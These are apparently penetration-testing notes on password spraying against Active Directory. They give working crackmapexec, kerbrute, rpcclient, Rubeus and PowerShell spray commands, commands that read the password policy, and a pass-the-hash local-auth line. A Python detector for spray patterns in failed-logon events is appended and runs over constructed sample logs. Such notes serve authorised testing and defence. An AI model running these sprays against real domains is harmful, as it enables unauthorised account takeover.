# Password Spraying

Once we have obtained several valid usernames, we can build a wordlist from those users and try, for example, rockyou.txt against each one.

A list of usernames that can be used for user enumeration: <https://github.com/insidetrust/statistically-likely-usernames>

## Password policy

If we also have a credential or a shell, we can retrieve the password policy with the following commands (taken from hacktricks):

```
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10
rpcclient $> querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview
```

## Spraying

First, the Linux techniques.

### Crackmapexec

```
crackmapexec smb 192.168.218.0/24 -u 'allimos' -p 'Password1'
crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
# the --local-auth flag indicates to only try once per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
```

### Kerbrute

```
# https://github.com/ropnop/kerbrute
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
```

### Metasploit

We have to use the `scanner/smb/smb_login` module.

### RPCClient

```
for u in $(cat users.txt); do 
    rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
```

Now on Windows:

Using [Rubeus.exe](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe) to brute force:

```
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```

### Invoke-DomainPasswordSpray

```
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```

### Invoke-SprayEmptyPassword.ps1

<https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1>
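Detection side of all the spraying above, added here as an example that is not part of these notes or of any tool they mention. It runs over constructed sample log lines (timestamp, event id, target user, source IP, as exported from Security events 4625 and 4771), and flags a source that fails against many distinct accounts inside a short window while staying under a per-account failure count, which is exactly the low-and-slow profile that a spray shows and a single user mistyping a password does not. The window, the thresholds and the line format are assumptions to tune for a real SIEM export.

```python
"""Password-spray detection over failed-logon events (added example).

Sample lines below are constructed, in an assumed whitespace-separated
export format: <iso timestamp> <event id> <target user> <source ip>.
4625 = failed logon, 4771 = Kerberos pre-authentication failed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON_IDS = {4625, 4771}

# Constructed sample data: one spray from 10.10.14.5 hitting six accounts,
# one legitimate user (grace) failing three times, one late failure.
SAMPLE_LOG = """\
2024-01-15T09:00:01 4625 alice 10.10.14.5
2024-01-15T09:00:02 4625 bob 10.10.14.5
2024-01-15T09:00:03 4771 carol 10.10.14.5
2024-01-15T09:00:04 4625 dave 10.10.14.5
2024-01-15T09:00:05 4625 erin 10.10.14.5
2024-01-15T09:00:06 4625 frank 10.10.14.5
2024-01-15T09:05:00 4625 grace 10.10.20.7
2024-01-15T09:05:10 4625 grace 10.10.20.7
2024-01-15T09:05:20 4625 grace 10.10.20.7
2024-01-15T10:30:00 4625 heidi 10.10.14.5
"""


def parse_line(line):
    """Parse one export line into (datetime, event_id, user, source_ip)."""
    ts, event_id, user, src = line.split()
    return datetime.fromisoformat(ts), int(event_id), user.lower(), src


def detect_spray(log_text, window=timedelta(minutes=10), min_users=5, max_per_user=3):
    """Return [(source_ip, window_start, sorted_users)] for every source that
    failed against >= min_users distinct accounts within `window` while no
    single account failed more than max_per_user times in that window."""
    by_source = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, event_id, user, src = parse_line(line)
        if event_id in FAILED_LOGON_IDS:
            by_source[src].append((ts, user))

    alerts = []
    for src, fails in by_source.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            # slide the window forward so fails[start:end+1] spans <= `window`
            while fails[end][0] - fails[start][0] > window:
                start += 1
            per_user = defaultdict(int)
            for _, user in fails[start:end + 1]:
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                alerts.append((src, fails[start][0], sorted(per_user)))
                break  # one alert per source; do not re-fire on every later event
    return alerts


if __name__ == "__main__":
    for src, since, users in detect_spray(SAMPLE_LOG):
        print(f"possible password spray from {src} since {since}: {', '.join(users)}")
```

The per-account ceiling is what separates this from a plain brute-force rule: a spray that respects the lockout threshold pulled from `net accounts` never trips per-user lockout alerts, so the rule keys on breadth of accounts per source instead. Correlating on the workstation name in 4771/4625 instead of, or in addition to, the source IP catches sprays that rotate source addresses.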

#### Reference

<https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/password-spraying>

